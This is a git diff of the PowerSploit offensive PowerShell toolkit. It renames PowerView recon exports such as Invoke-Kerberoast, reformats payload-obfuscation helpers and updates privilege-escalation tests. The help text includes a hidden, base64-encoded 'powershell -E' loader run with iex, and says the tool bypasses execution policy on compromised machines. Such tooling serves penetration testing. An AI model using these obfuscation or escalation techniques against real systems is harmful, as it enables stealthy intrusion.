index a170218..d0a4148 100644
--- a/Recon/Recon.psd1
+++ b/Recon/Recon.psd1
@@ -23,83 +23,85 @@ PowerShellVersion = '2.0'
 

 # Functions to export from this module

 FunctionsToExport = @(

-    'Add-NetGroupUser',

-    'Add-NetUser',

-    'Add-ObjectAcl',

-    'Convert-NameToSid',

-    'Convert-SidToName',

+    'Export-PowerViewCSV',

+    'Resolve-IPAddress',

+    'ConvertTo-SID',

+    'ConvertFrom-SID',

     'Convert-ADName',

     'ConvertFrom-UACValue',

-    'Export-PowerViewCSV',

-    'Find-ComputerField',

-    'Find-ForeignGroup',

-    'Find-ForeignUser',

-    'Find-GPOComputerAdmin',

-    'Find-GPOLocation',

-    'Find-InterestingFile',

-    'Find-LocalAdminAccess',

-    'Find-ManagedSecurityGroups',

-    'Find-UserField',

-    'Get-ADObject',

-    'Get-CachedRDPConnection',

-    'Get-ComputerDetails',

-    'Get-ComputerProperty',

-    'Get-DFSshare',

-    'Get-DNSRecord',

-    'Get-DNSZone',

-    'Get-DomainPolicy',

+    'Add-RemoteConnection',

+    'Remove-RemoteConnection',

+    'Invoke-UserImpersonation',

+    'Invoke-RevertToSelf',

+    'Get-DomainSPNTicket',

+    'Invoke-Kerberoast',

+    'Get-PathAcl',

+    'Get-DomainDNSZone',

+    'Get-DomainDNSRecord',

+    'Get-Domain',

+    'Get-DomainController',

+    'Get-Forest',

+    'Get-ForestDomain',

+    'Get-ForestGlobalCatalog',

+    'Find-DomainObjectPropertyOutlier',

+    'Get-DomainUser',

+    'New-DomainUser',

+    'Set-DomainUserPassword',

+    'Get-DomainUserEvent',

+    'Get-DomainComputer',

+    'Get-DomainObject',

+    'Set-DomainObject',

+    'Set-DomainObjectOwner',

+    'Get-DomainObjectAcl',

+    'Add-DomainObjectAcl',

+    'Find-InterestingDomainAcl',

+    'Get-DomainOU',

+    'Get-DomainSite',

+    'Get-DomainSubnet',

     'Get-DomainSID',

-    'Get-ExploitableSystem',

-    'Get-GUIDMap',

-    'Get-HttpStatus',

-    'Get-IPAddress',

-    'Get-LastLoggedOn',

-    'Get-LoggedOnLocal',

-    'Get-NetComputer',

-    'Get-NetDomain',

-    'Get-NetDomainController',

-    'Get-NetDomainTrust',

-    'Get-NetFileServer',

-    'Get-NetForest',

-    'Get-NetForestCatalog',

-    'Get-NetForestDomain',

-    'Get-NetForestTrust',

-    'Get-NetGPO',

-    'Get-NetGPOGroup',

-    'Get-NetGroup',

-    'Get-NetGroupMember',

+    'Get-DomainGroup',

+    'New-DomainGroup',

+    'Get-DomainManagedSecurityGroup',

+    'Get-DomainGroupMember',

+    'Add-DomainGroupMember',

+    'Get-DomainFileServer',

+    'Get-DomainDFSShare',

+    'Get-DomainGPO',

+    'Get-DomainGPOLocalGroup',

+    'Get-DomainGPOUserLocalGroupMapping',

+    'Get-DomainGPOComputerLocalGroupMapping',

+    'Get-DomainPolicy',

     'Get-NetLocalGroup',

+    'Get-NetLocalGroupMember',

+    'Get-NetShare',

     'Get-NetLoggedon',

-    'Get-NetOU',

-    'Get-NetProcess',

-    'Get-NetRDPSession',

     'Get-NetSession',

-    'Get-NetShare',

-    'Get-NetSite',

-    'Get-NetSubnet',

-    'Get-NetUser',

-    'Get-ObjectAcl',

-    'Get-PathAcl',

-    'Get-Proxy',

-    'Get-RegistryMountedDrive',

-    'Get-SiteName',

-    'Get-UserEvent',

-    'Get-UserProperty',

-    'Invoke-ACLScanner',

-    'Invoke-CheckLocalAdminAccess',

-    'Invoke-DowngradeAccount',

-    'Invoke-EnumerateLocalAdmin',

-    'Invoke-EventHunter',

-    'Invoke-FileFinder',

-    'Invoke-MapDomainTrust',

+    'Get-RegLoggedOn',

+    'Get-NetRDPSession',

+    'Test-AdminAccess',

+    'Get-NetComputerSiteName',

+    'Get-WMIRegProxy',

+    'Get-WMIRegLastLoggedOn',

+    'Get-WMIRegCachedRDPConnection',

+    'Get-WMIRegMountedDrive',

+    'Get-WMIProcess',

+    'Find-InterestingFile',

+    'Find-DomainUserLocation',

+    'Find-DomainProcess',

+    'Find-DomainUserEvent',

+    'Find-DomainShare',

+    'Find-InterestingDomainShareFile',

+    'Find-LocalAdminAccess',

+    'Find-DomainLocalGroupMember',

+    'Get-DomainTrust',

+    'Get-ForestTrust',

+    'Get-DomainForeignUser',

+    'Get-DomainForeignGroupMember',

+    'Get-DomainTrustMapping',

+    'Get-ComputerDetail',

+    'Get-HttpStatus',

     'Invoke-Portscan',

-    'Invoke-ProcessHunter',

-    'Invoke-ReverseDnsLookup',

-    'Invoke-ShareFinder',

-    'Invoke-UserHunter',

-    'New-GPOImmediateTask',

-    'Request-SPNTicket',

-    'Set-ADObject'

+    'Invoke-ReverseDnsLookup'

 )

 

 # List of all files packaged with this module

diff --git a/ScriptModification/Out-CompressedDll.ps1 b/ScriptModification/Out-CompressedDll.ps1
index 5e6897d..8608956 100644
--- a/ScriptModification/Out-CompressedDll.ps1
+++ b/ScriptModification/Out-CompressedDll.ps1
@@ -5,12 +5,12 @@ function Out-CompressedDll
 

 Compresses, Base-64 encodes, and outputs generated code to load a managed dll in memory.

 

-PowerSploit Function: Out-CompressedDll

-Author: Matthew Graeber (@mattifestation)

-License: BSD 3-Clause

-Required Dependencies: None

-Optional Dependencies: None

- 

+PowerSploit Function: Out-CompressedDll  

+Author: Matthew Graeber (@mattifestation)  

+License: BSD 3-Clause  

+Required Dependencies: None  

+Optional Dependencies: None  

+

 .DESCRIPTION

 

 Out-CompressedDll outputs code that loads a compressed representation of a managed dll in memory as a byte array.

@@ -21,7 +21,7 @@ Specifies the path to a managed executable.
 

 .EXAMPLE

 

-C:\PS> Out-CompressedDll -FilePath evil.dll

+Out-CompressedDll -FilePath evil.dll

 

 Description

 -----------

@@ -36,7 +36,9 @@ Only pure MSIL-based dlls can be loaded using this technique. Native or IJW ('it
 http://www.exploit-monday.com/2012/12/in-memory-dll-loading.html

 #>

 

-    [CmdletBinding()] Param (

+    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]

+    [CmdletBinding()]

+    Param (

         [Parameter(Mandatory = $True)]

         [String]

         $FilePath

@@ -51,7 +53,7 @@ http://www.exploit-monday.com/2012/12/in-memory-dll-loading.html
 

     $FileBytes = [System.IO.File]::ReadAllBytes($Path)

 

-    if (($FileBytes[0..1] | % {[Char]$_}) -join '' -cne 'MZ')

+    if (($FileBytes[0..1] | ForEach-Object {[Char]$_}) -join '' -cne 'MZ')

     {

         Throw "$Path is not a valid executable."

     }

diff --git a/ScriptModification/Out-EncodedCommand.ps1 b/ScriptModification/Out-EncodedCommand.ps1
index 04e8c12..6f21391 100644
--- a/ScriptModification/Out-EncodedCommand.ps1
+++ b/ScriptModification/Out-EncodedCommand.ps1
@@ -5,12 +5,12 @@ function Out-EncodedCommand
 

 Compresses, Base-64 encodes, and generates command-line output for a PowerShell payload script.

 

-PowerSploit Function: Out-EncodedCommand

-Author: Matthew Graeber (@mattifestation)

-License: BSD 3-Clause

-Required Dependencies: None

-Optional Dependencies: None

- 

+PowerSploit Function: Out-EncodedCommand  

+Author: Matthew Graeber (@mattifestation)  

+License: BSD 3-Clause  

+Required Dependencies: None  

+Optional Dependencies: None  

+

 .DESCRIPTION

 

 Out-EncodedCommand prepares a PowerShell script such that it can be pasted into a command prompt. The scenario for using this tool is the following: You compromise a machine, have a shell and want to execute a PowerShell script as a payload. This technique eliminates the need for an interactive PowerShell 'shell' and it bypasses any PowerShell execution policies.

@@ -49,13 +49,13 @@ Base-64 encodes the entirety of the output. This is usually unnecessary and effe
 

 .EXAMPLE

 

-C:\PS> Out-EncodedCommand -ScriptBlock {Write-Host 'hello, world!'}

+Out-EncodedCommand -ScriptBlock {Write-Host 'hello, world!'}

 

 powershell -C sal a New-Object;iex(a IO.StreamReader((a IO.Compression.DeflateStream([IO.MemoryStream][Convert]::FromBase64String('Cy/KLEnV9cgvLlFQz0jNycnXUSjPL8pJUVQHAA=='),[IO.Compression.CompressionMode]::Decompress)),[Text.Encoding]::ASCII)).ReadToEnd()

 

 .EXAMPLE

 

-C:\PS> Out-EncodedCommand -Path C:\EvilPayload.ps1 -NonInteractive -NoProfile -WindowStyle Hidden -EncodedOutput

+Out-EncodedCommand -Path C:\EvilPayload.ps1 -NonInteractive -NoProfile -WindowStyle Hidden -EncodedOutput

 

 powershell -NoP -NonI -W Hidden -E cwBhAGwAIABhACAATgBlAHcALQBPAGIAagBlAGMAdAA7AGkAZQB4ACgAYQAgAEkATwAuAFMAdAByAGUAYQBtAFIAZQBhAGQAZQByACgAKABhACAASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4ARABlAGYAbABhAHQAZQBTAHQAcgBlAGEAbQAoAFsASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AXQBbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACcATABjAGkAeABDAHMASQB3AEUAQQBEAFEAWAAzAEUASQBWAEkAYwBtAEwAaQA1AEsAawBGAEsARQA2AGwAQgBCAFIAWABDADgAaABLAE8ATgBwAEwAawBRAEwANAAzACsAdgBRAGgAdQBqAHkAZABBADkAMQBqAHEAcwAzAG0AaQA1AFUAWABkADAAdgBUAG4ATQBUAEMAbQBnAEgAeAA0AFIAMAA4AEoAawAyAHgAaQA5AE0ANABDAE8AdwBvADcAQQBmAEwAdQBYAHMANQA0ADEATwBLAFcATQB2ADYAaQBoADkAawBOAHcATABpAHMAUgB1AGEANABWAGEAcQBVAEkAagArAFUATwBSAHUAVQBsAGkAWgBWAGcATwAyADQAbgB6AFYAMQB3ACsAWgA2AGUAbAB5ADYAWgBsADIAdAB2AGcAPQA9ACcAKQAsAFsASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApACkALABbAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkAKQAuAFIAZQBhAGQAVABvAEUAbgBkACgAKQA=

 

@@ -72,7 +72,8 @@ This cmdlet was inspired by the createcmd.ps1 script introduced during Dave Kenn
 http://www.exploit-monday.com

 #>

 

-    [CmdletBinding( DefaultParameterSetName = 'FilePath')] Param (

+    [CmdletBinding( DefaultParameterSetName = 'FilePath')]

+    Param (

         [Parameter(Position = 0, ValueFromPipeline = $True, ParameterSetName = 'ScriptBlock' )]

         [ValidateNotNullOrEmpty()]

         [ScriptBlock]

diff --git a/ScriptModification/Out-EncryptedScript.ps1 b/ScriptModification/Out-EncryptedScript.ps1
index eba48f7..c24b126 100644
--- a/ScriptModification/Out-EncryptedScript.ps1
+++ b/ScriptModification/Out-EncryptedScript.ps1
@@ -5,11 +5,11 @@ function Out-EncryptedScript
 

 Encrypts text files/scripts.

 

-PowerSploit Function: Out-EncryptedScript

-Author: Matthew Graeber (@mattifestation)

-License: BSD 3-Clause

-Required Dependencies: None

-Optional Dependencies: None

+PowerSploit Function: Out-EncryptedScript  

+Author: Matthew Graeber (@mattifestation)  

+License: BSD 3-Clause  

+Required Dependencies: None  

+Optional Dependencies: None  

 

 .DESCRIPTION

 

@@ -36,7 +36,8 @@ is randomly generated by default.
 

 .EXAMPLE

 

-C:\PS> Out-EncryptedScript .\Naughty-Script.ps1 password salty

+$Password = ConvertTo-SecureString 'Password123!' -AsPlainText -Force

+Out-EncryptedScript .\Naughty-Script.ps1 $Password salty

 

 Description

 -----------

@@ -48,10 +49,10 @@ function 'de' and the base64-encoded ciphertext.
 

 .EXAMPLE

 

-C:\PS> [String] $cmd = Get-Content .\evil.ps1

-C:\PS> Invoke-Expression $cmd

-C:\PS> $decrypted = de password salt

-C:\PS> Invoke-Expression $decrypted

+[String] $cmd = Get-Content .\evil.ps1

+Invoke-Expression $cmd

+$decrypted = de password salt

+Invoke-Expression $decrypted

 

 Description

 -----------

@@ -64,34 +65,39 @@ unencrypted script is called via Invoke-Expression
 This command can be used to encrypt any text-based file/script

 #>

 

-    [CmdletBinding()] Param (

+    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]

+    [CmdletBinding()]

+    Param (

         [Parameter(Position = 0, Mandatory = $True)]

         [String]

         $ScriptPath,

-    

+

         [Parameter(Position = 1, Mandatory = $True)]

-        [String]

+        [Security.SecureString]

         $Password,

-    

+

         [Parameter(Position = 2, Mandatory = $True)]

         [String]

         $Salt,

-    

+

         [Parameter(Position = 3)]

         [ValidateLength(16, 16)]

         [String]

-        $InitializationVector = ((1..16 | % {[Char](Get-Random -Min 0x41 -Max 0x5B)}) -join ''),

-    

+        $InitializationVector = ((1..16 | ForEach-Object {[Char](Get-Random -Min 0x41 -Max 0x5B)}) -join ''),

+

         [Parameter(Position = 4)]

         [String]

         $FilePath = '.\evil.ps1'

     )

 

+    $TempCred = New-Object System.Management.Automation.PSCredential('a', $Password)

+    $PlaintextPassword = $TempCred.GetNetworkCredential().Password

+

     $AsciiEncoder = New-Object System.Text.ASCIIEncoding

     $ivBytes = $AsciiEncoder.GetBytes($InitializationVector)

     # While this can be used to encrypt any file, it's primarily designed to encrypt itself.

     [Byte[]] $scriptBytes = Get-Content -Encoding Byte -ReadCount 0 -Path $ScriptPath

-    $DerivedPass = New-Object System.Security.Cryptography.PasswordDeriveBytes($Password, $AsciiEncoder.GetBytes($Salt), "SHA1", 2)

+    $DerivedPass = New-Object System.Security.Cryptography.PasswordDeriveBytes($PlaintextPassword, $AsciiEncoder.GetBytes($Salt), "SHA1", 2)

     $Key = New-Object System.Security.Cryptography.TripleDESCryptoServiceProvider

     $Key.Mode = [System.Security.Cryptography.CipherMode]::CBC

     [Byte[]] $KeyBytes = $DerivedPass.GetBytes(16)

diff --git a/ScriptModification/Remove-Comments.ps1 b/ScriptModification/Remove-Comment.ps1
index 45a9746..6194419 100644
--- a/ScriptModification/Remove-Comments.ps1
+++ b/ScriptModification/Remove-Comment.ps1
@@ -1,19 +1,19 @@
-function Remove-Comments

+function Remove-Comment

 {

 <#

 .SYNOPSIS

 

 Strips comments and extra whitespace from a script.

 

-PowerSploit Function: Remove-Comments

-Author: Matthew Graeber (@mattifestation)

-License: BSD 3-Clause

-Required Dependencies: None

-Optional Dependencies: None

- 

+PowerSploit Function: Remove-Comment  

+Author: Matthew Graeber (@mattifestation)  

+License: BSD 3-Clause  

+Required Dependencies: None  

+Optional Dependencies: None  

+

 .DESCRIPTION

 

-Remove-Comments strips out comments and unnecessary whitespace from a script. This is best used in conjunction with Out-EncodedCommand when the size of the script to be encoded might be too big.

+Remove-Comment strips out comments and unnecessary whitespace from a script. This is best used in conjunction with Out-EncodedCommand when the size of the script to be encoded might be too big.

 

 A major portion of this code was taken from the Lee Holmes' Show-ColorizedContent script. You rock, Lee!

 

@@ -27,11 +27,11 @@ Specifies the path to your script.
 

 .EXAMPLE

 

-C:\PS> $Stripped = Remove-Comments -Path .\ScriptWithComments.ps1

+$Stripped = Remove-Comment -Path .\ScriptWithComments.ps1

 

 .EXAMPLE

 

-C:\PS> Remove-Comments -ScriptBlock {

+Remove-Comment -ScriptBlock {

 ### This is my awesome script. My documentation is beyond reproach!

       Write-Host 'Hello, World!' ### Write 'Hello, World' to the host

 ### End script awesomeness

@@ -41,7 +41,7 @@ Write-Host 'Hello, World!'
 

 .EXAMPLE

 

-C:\PS> Remove-Comments -Path Inject-Shellcode.ps1 | Out-EncodedCommand

+Remove-Comment -Path Inject-Shellcode.ps1 | Out-EncodedCommand

 

 Description

 -----------

@@ -57,15 +57,17 @@ Accepts either a string containing the path to a script or a scriptblock.
 

 System.Management.Automation.ScriptBlock

 

-Remove-Comments returns a scriptblock. Call the ToString method to convert a scriptblock to a string, if desired.

+Remove-Comment returns a scriptblock. Call the ToString method to convert a scriptblock to a string, if desired.

 

 .LINK

 

 http://www.exploit-monday.com

 http://www.leeholmes.com/blog/2007/11/07/syntax-highlighting-in-powershell/

 #>

-

-    [CmdletBinding( DefaultParameterSetName = 'FilePath' )] Param (

+    

+    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseShouldProcessForStateChangingFunctions', '')]

+    [CmdletBinding( DefaultParameterSetName = 'FilePath' )]

+    Param (

         [Parameter(Position = 0, Mandatory = $True, ParameterSetName = 'FilePath' )]

         [ValidateNotNullOrEmpty()]

         [String]

diff --git a/ScriptModification/ScriptModification.psd1 b/ScriptModification/ScriptModification.psd1
index 923c874..07cd0bf 100644
--- a/ScriptModification/ScriptModification.psd1
+++ b/ScriptModification/ScriptModification.psd1
@@ -26,6 +26,6 @@ FunctionsToExport = '*'
 

 # List of all files packaged with this module

 FileList = 'ScriptModification.psm1', 'ScriptModification.psd1', 'Out-CompressedDll.ps1', 'Out-EncodedCommand.ps1', 

-               'Out-EncryptedScript.ps1', 'Remove-Comments.ps1', 'Usage.md'

+               'Out-EncryptedScript.ps1', 'Remove-Comment.ps1', 'Usage.md'

 

 }

diff --git a/Tests/Privesc.tests.ps1 b/Tests/Privesc.tests.ps1
index 9b9872b..b843531 100644
--- a/Tests/Privesc.tests.ps1
+++ b/Tests/Privesc.tests.ps1
@@ -126,40 +126,142 @@ Describe 'Get-ModifiablePath' {
     }
 }
 
-Describe 'Get-CurrentUserTokenGroupSid' {
 
-    if(-not $(Test-IsAdmin)) { 
-        Throw "'Get-CurrentUserTokenGroupSid' Pester test needs local administrator privileges."
+Describe 'Get-ProcessTokenGroup' {
+
+    if (-not $(Test-IsAdmin)) {
+        Throw "'Get-ProcessTokenGroup' Pester test needs local administrator privileges."
     }
 
     It 'Should not throw.' {
-        {Get-CurrentUserTokenGroupSid} | Should Not Throw
+        {Get-ProcessTokenGroup} | Should Not Throw
     }
 
-    It 'Should return SIDs and Attributes.' {
-        $Output = Get-CurrentUserTokenGroupSid | Select-Object -First 1
+    It 'Should return SID, Attribute, and ProcessID.' {
+        $Output = Get-ProcessTokenGroup | Select-Object -First 1
 
         if ($Output.PSObject.Properties.Name -notcontains 'SID') {
-            Throw "Get-CurrentUserTokenGroupSid result doesn't contain 'SID' field."
+            Throw "Get-ProcessTokenGroup result doesn't contain 'SID' field."
         }
 
         if ($Output.PSObject.Properties.Name -notcontains 'Attributes') {
-            Throw "Get-CurrentUserTokenGroupSid result doesn't contain 'Attributes' field."
+            Throw "Get-ProcessTokenGroup result doesn't contain 'Attributes' field."
+        }
+
+        if ($Output.PSObject.Properties.Name -notcontains 'ProcessID') {
+            Throw "Get-ProcessTokenGroup result doesn't contain 'ProcessID' field."
+        }
+    }
+
+    It 'Should accept a process object on the pipeline.' {
+        $Output = Get-Process -Id $PID | Get-ProcessTokenGroup | Select-Object -First 1
+        $Output | Should Not BeNullOrEmpty
+    }
+
+    It 'Should accept multiple process objects on the pipeline.' {
+        $Output = @($(Get-Process -Id $PID), $(Get-Process -Id $PID)) | Get-ProcessTokenGroup | Where-Object {$_.SID -match 'S-1-5-32-544'}
+        if ($Output.Length -lt 2) {
+            Throw "'Get-ProcessTokenGroup' doesn't return Dacls for multiple service objects on the pipeline."
         }
     }
 
     It 'Should return the local administrators group SID.' {
-        $CurrentUserSids = Get-CurrentUserTokenGroupSid | Select-Object -ExpandProperty SID
+        $CurrentUserSids = Get-ProcessTokenGroup | Select-Object -ExpandProperty SID
 
-        if($CurrentUserSids -notcontains 'S-1-5-32-544') {
-            Throw "Get-CurrentUserTokenGroupSid result doesn't contain local administrators 'S-1-5-32-544' sid"
+        if ($CurrentUserSids -notcontains 'S-1-5-32-544') {
+            Throw "Get-ProcessTokenGroup result doesn't contain local administrators 'S-1-5-32-544' sid"
         }
     }
 }
 
+
+Describe 'Get-ProcessTokenPrivilege' {
+
+    if (-not $(Test-IsAdmin)) {
+        Throw "'Get-ProcessTokenPrivilege' Pester test needs local administrator privileges."
+    }
+
+    It 'Should not throw.' {
+        {Get-ProcessTokenPrivilege} | Should Not Throw
+    }
+
+    It 'Should return Privilege, Attribute, and ProcessID.' {
+        $Output = Get-ProcessTokenPrivilege | Select-Object -First 1
+
+        if ($Output.PSObject.Properties.Name -notcontains 'Privilege') {
+            Throw "Get-ProcessTokenPrivilege result doesn't contain 'Privilege' field."
+        }
+
+        if ($Output.PSObject.Properties.Name -notcontains 'Attributes') {
+            Throw "Get-ProcessTokenPrivilege result doesn't contain 'Attributes' field."
+        }
+
+        if ($Output.PSObject.Properties.Name -notcontains 'ProcessID') {
+            Throw "Get-ProcessTokenPrivilege result doesn't contain 'ProcessID' field."
+        }
+    }
+
+    It 'Should accept the -Special argument' {
+        $Output = Get-Process -Id $PID | Get-ProcessTokenPrivilege -Special | Select-Object -First 1
+        $Output | Should Not BeNullOrEmpty
+    }
+
+    It 'Should accept a process object on the pipeline.' {
+        $Output = Get-Process -Id $PID | Get-ProcessTokenPrivilege | Select-Object -First 1
+        $Output | Should Not BeNullOrEmpty
+    }
+
+    It 'Should accept multiple process objects on the pipeline.' {
+        $Output = @($(Get-Process -Id $PID), $(Get-Process -Id $PID)) | Get-ProcessTokenPrivilege | Where-Object {$_.Privilege -match 'SeShutdownPrivilege'}
+        if ($Output.Length -lt 2) {
+            Throw "'Get-ProcessTokenPrivilege' doesn't return Dacls for multiple service objects on the pipeline."
+        }
+    }
+
+    It 'Should return the correct privileges.' {
+        $Privileges = Get-ProcessTokenPrivilege | Select-Object -ExpandProperty Privilege
+
+        if ($Privileges -NotContains 'SeShutdownPrivilege') {
+            Throw "Get-ProcessTokenPrivilege result doesn't the SeShutdownPrivilege"
+        }
+    }
+}
+
+
+Describe 'Enable-Privilege' {
+    if (-not $(Test-IsAdmin)) {
+        Throw "'Enable-Privilege' Pester test needs local administrator privileges."
+    }
+
+    It 'Should not accept an invalid privilege.' {
+        {Enable-Privilege -Privilege 'nonexistent'} | Should Throw
+    }
+
+    It 'Should successfully enable a specified privilege.' {
+        $Output = Get-ProcessTokenPrivilege | Where-Object {$_.Privilege -match 'SeShutdownPrivilege'}
+        if ($Output.Attributes -ne 0) {
+            Throw "'SeShutdownPrivilege is already enabled."
+        }
+        {Enable-Privilege -Privilege 'SeShutdownPrivilege'} | Should Not Throw
+        $Output = Get-ProcessTokenPrivilege | Where-Object {$_.Privilege -match 'SeShutdownPrivilege'}
+        if ($Output.Attributes -eq 0) {
+            Throw "'SeShutdownPrivilege not successfully enabled."
+        }
+    }
+
+    It 'Should accept the output from Get-ProcessTokenPrivilege.' {
+        {Get-ProcessTokenPrivilege | Enable-Privilege} | Should Not Throw
+        $Output = Get-ProcessTokenPrivilege | Where-Object {$_.Privilege -match 'SeBackupPrivilege'}
+        if ($Output.Attributes -eq 0) {
+            Throw "'SeBackupPrivilege not successfully enabled."
+        }
+    }
+}
+
+
 Describe 'Add-ServiceDacl' {
 
-    if(-not $(Test-IsAdmin)) { 
+    if (-not $(Test-IsAdmin)) {
         Throw "'Add-ServiceDacl' Pester test needs local administrator privileges."
     }
 
@@ -176,7 +278,7 @@ Describe 'Add-ServiceDacl' {
         $ServiceName = Get-Service | Select-Object -First 1 | Select-Object -ExpandProperty Name
         $ServiceWithDacl = Add-ServiceDacl -Name $ServiceName
 
-        if(-not $ServiceWithDacl.Dacl) {
+        if (-not $ServiceWithDacl.Dacl) {
             Throw "'Add-ServiceDacl' doesn't return a Dacl for a service passed as parameter."
         }
     }
@@ -185,7 +287,7 @@ Describe 'Add-ServiceDacl' {
         $ServiceNames = Get-Service | Select-Object -First 5 | Select-Object -ExpandProperty Name
         $ServicesWithDacl = Add-ServiceDacl -Name $ServiceNames
 
-        if(-not $ServicesWithDacl.Dacl) {
+        if (-not $ServicesWithDacl.Dacl) {
             Throw "'Add-ServiceDacl' doesn't return Dacls for an array of service names as a parameter."
         }
     }
@@ -194,7 +296,7 @@ Describe 'Add-ServiceDacl' {
         $Service = Get-Service | Select-Object -First 1
         $ServiceWithDacl = $Service | Add-ServiceDacl
 
-        if(-not $ServiceWithDacl.Dacl) {
+        if (-not $ServiceWithDacl.Dacl) {
             Throw "'Add-ServiceDacl' doesn't return a Dacl for a service object on the pipeline."
         }
     }
@@ -203,7 +305,7 @@ Describe 'Add-ServiceDacl' {
         $ServiceName = Get-Service | Select-Object -First 1 | Select-Object -ExpandProperty Name
         $ServiceWithDacl = $ServiceName | Add-ServiceDacl
 
-        if(-not $ServiceWithDacl.Dacl) {
+        if (-not $ServiceWithDacl.Dacl) {
             Throw "'Add-ServiceDacl' doesn't return a Dacl for a service name on the pipeline."
         }
     }
@@ -212,7 +314,7 @@ Describe 'Add-ServiceDacl' {
         $Services = Get-Service | Select-Object -First 5
         $ServicesWithDacl = $Services | Add-ServiceDacl
 
-        if(-not $ServicesWithDacl.Dacl) {
+        if (-not $ServicesWithDacl.Dacl) {
             Throw "'Add-ServiceDacl' doesn't return Dacls for multiple service objects on the pipeline."
         }
     }
@@ -221,7 +323,7 @@ Describe 'Add-ServiceDacl' {
         $ServiceNames = Get-Service | Select-Object -First 5 | Select-Object -ExpandProperty Name
         $ServicesWithDacl = $ServiceNames | Add-ServiceDacl
 
-        if(-not $ServicesWithDacl.Dacl) {
+        if (-not $ServicesWithDacl.Dacl) {
             Throw "'Add-ServiceDacl' doesn't return Dacls for multiple service names on the pipeline."
         }
     }
@@ -232,16 +334,16 @@ Describe 'Add-ServiceDacl' {
 
         # 'AllAccess' = [uint32]'0x000F01FF'
         $Rights = $ServiceWithDacl.Dacl | Where-Object {$_.SecurityIdentifier -eq 'S-1-5-32-544'}
-        if(($Rights.AccessRights -band 0x000F01FF) -ne 0x000F01FF) {
+        if (($Rights.AccessRights -band 0x000F01FF) -ne 0x000F01FF) {
             Throw "'Add-ServiceDacl' doesn't return the correct service Dacl."
         }
     }
 }
 
-Describe 'Set-ServiceBinPath' {
+Describe 'Set-ServiceBinaryPath' {
 
-    if(-not $(Test-IsAdmin)) { 
-        Throw "'Set-ServiceBinPath' Pester test needs local administrator privileges."
+    if (-not $(Test-IsAdmin)) {
+        Throw "'Set-ServiceBinaryPath' Pester test needs local administrator privileges."
     }
 
     It 'Should fail for a non-existent service.' {
@@ -249,13 +351,13 @@ Describe 'Set-ServiceBinPath' {
         $ServicePath = 'C:\Program Files\service.exe'
 
         $Result = $False
-        {$Result = Set-ServiceBinPath -Name $ServiceName -binPath $ServicePath} | Should Throw
+        {$Result = Set-ServiceBinaryPath -Name $ServiceName -Path $ServicePath} | Should Throw
         $Result | Should Be $False
     }
 
-    It 'Should throw with an empty binPath.' {
+    It 'Should throw with an empty Path.' {
         $ServiceName = Get-RandomName
-        {Set-ServiceBinPath -Name $ServiceName -binPath ''} | Should Throw
+        {Set-ServiceBinaryPath -Name $ServiceName -Path ''} | Should Throw
     }
 
     It 'Should correctly set a service binary path.' {
@@ -264,7 +366,7 @@ Describe 'Set-ServiceBinPath' {
         sc.exe create $ServiceName binPath= $ServicePath | Should Match 'SUCCESS'
         Start-Sleep -Seconds 1
 
-        $Result = Set-ServiceBinPath -Name $ServiceName -binPath $ServicePath
+        $Result = Set-ServiceBinaryPath -Name $ServiceName -Path $ServicePath
         $Result | Should Be $True
         $ServiceDetails = Get-WmiObject -Class win32_service -Filter "Name='$ServiceName'"
         $ServiceDetails.PathName | Should be $ServicePath
@@ -278,7 +380,7 @@ Describe 'Set-ServiceBinPath' {
         sc.exe create $ServiceName binPath= $ServicePath | Should Match 'SUCCESS'
         Start-Sleep -Seconds 1
 
-        $Result = $ServiceName | Set-ServiceBinPath -binPath $ServicePath
+        $Result = $ServiceName | Set-ServiceBinaryPath -Path $ServicePath
         $Result | Should Be $True
 
         $ServiceDetails = Get-WmiObject -Class win32_service -Filter "Name='$ServiceName'"
@@ -293,7 +395,7 @@ Describe 'Set-ServiceBinPath' {
         sc.exe create $ServiceName binPath= $ServicePath | Should Match 'SUCCESS'
         Start-Sleep -Seconds 1
 
-        $Result = Get-Service $ServiceName | Set-ServiceBinPath -binPath $ServicePath
+        $Result = Get-Service $ServiceName | Set-ServiceBinaryPath -Path $ServicePath
         $Result | Should Be $True
         
         $ServiceDetails = Get-WmiObject -Class win32_service -Filter "Name='$ServiceName'"
@@ -306,7 +408,7 @@ Describe 'Set-ServiceBinPath' {
 
 Describe 'Test-ServiceDaclPermission' {
 
-    if(-not $(Test-IsAdmin)) { 
+    if (-not $(Test-IsAdmin)) {
         Throw "'Test-ServiceDaclPermission' Pester test needs local administrator privileges."
     }
 
@@ -445,14 +547,14 @@ Describe 'Test-ServiceDaclPermission' {
 #
 ########################################################
 
-Describe 'Get-ServiceUnquoted' {
+Describe 'Get-UnquotedService' {
 
-    if(-not $(Test-IsAdmin)) { 
-        Throw "'Get-ServiceUnquoted' Pester test needs local administrator privileges."
+    if (-not $(Test-IsAdmin)) {
+        Throw "'Get-UnquotedService' Pester test needs local administrator privileges."
     }
 
     It "Should not throw." {
-        {Get-ServiceUnquoted} | Should Not Throw
+        {Get-UnquotedService} | Should Not Throw
     }
 
     It 'Should return service with a space in an unquoted binPath.' {
@@ -463,7 +565,7 @@ Describe 'Get-ServiceUnquoted' {
         sc.exe create $ServiceName binPath= $ServicePath | Should Match 'SUCCESS'
         Start-Sleep -Seconds 1
 
-        $Output = Get-ServiceUnquoted | Where-Object { $_.ServiceName -eq $ServiceName }
+        $Output = Get-UnquotedService | Where-Object { $_.ServiceName -eq $ServiceName }
         sc.exe delete $ServiceName | Should Match 'SUCCESS'
 
         $Output | Should Not BeNullOrEmpty
@@ -478,7 +580,7 @@ Describe 'Get-ServiceUnquoted' {
         sc.exe create $ServiceName binPath= $ServicePath | Should Match 'SUCCESS'
         Start-Sleep -Seconds 1
 
-        $Output = Get-ServiceUnquoted | Where-Object { $_.ServiceName -eq $ServiceName }
